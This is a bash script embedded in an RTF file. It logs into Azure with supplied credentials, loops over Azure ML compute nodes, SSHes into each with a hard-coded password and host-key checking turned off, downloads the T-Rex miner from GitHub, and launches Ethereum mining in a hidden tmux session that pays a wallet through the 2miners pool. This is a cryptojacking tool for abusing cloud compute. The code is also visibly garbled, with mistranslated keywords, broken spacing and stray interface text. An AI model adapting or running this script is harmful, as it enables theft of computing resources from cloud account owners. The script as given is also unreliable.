{\rtf1\ansi\ansicpg1252\cocoartf2636
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red0\green0\blue0;}
{\*\expandedcolortbl;;\cssrgb\c0\c0\c0;}
\paperw11900\paperh16840\margl1440\margr1440\vieww13960\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs26 \cf0 \expnd0\expndtw0\kerning0
\outl0\strokewidth0 \strokec2 #! /bin/bash \
loginString = (loginString_) \
worker = "worker_" \
wallet = "wallet_" \
username = "username_" \
password = "password_" \
location = "location_" \
group = "group_" \
\
####### ################################################## ################################################# # ## \
echo | sudo add-apt-repository ppa:micahflee /ppa \
echo Y | sudo apt install sshpass \
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash \
az extension add -n ml -y \
az login --service-major --username $\{loginString[0]\} --password $\{loginString[1]\} --tenant $\{loginString[2]\} ; \
\
while [1] \
do\
    list = $ (az ml calculate list -g $ group -w ws_ $ location --query '[] .name' -o tsv) \
    for names in $list \
    do \
        printf "\\n ==> $name\\n" \
        ip = $ (az ml compute list-node -n $ name -g $ group -w ws_ $ location --query "[0] .public_ip_address" -o tsv) \
        if [["$ ip"! = ""]] \
        then \
            port = $ (az ml compute list-node -n $ name -g $ group -w ws_ $ location --query "[0] .port" -o tsv) \
            session = $ (sshpass -p $ password ssh -o StrictHostKeyChecking = no $ username @ $ ip -p $ port "tmux ls") \
            echo $session \
            if [["$session"! = * "1 window"\
                echo "start ssh" \
                sshpass -p $password ssh -o StrictHostKeyChecking = no $username @ $ip -p $port "wget \uc0\u8203 \u8203 https://github.com/trexminer/T-Rex/releases/download/0.25 .9/t-rex-0.25. 9-linux.tar.gz; tar -xf t-rex-0.25.9-linux.tar.gz; tmux new-session -d -s 1; tmux send -t 1 \\ "sudo ./t-rex -a ethash -o stratum + tcp://eth.2miners.com: 2020 -u $ wallet -px -w $ worker \\ "ENTER" \
            other \
                echo "running" \
            fi \
        other \
            echo "no Press \
the " \
        Finish " button \
    to \
    sleep for 60 minutes\
}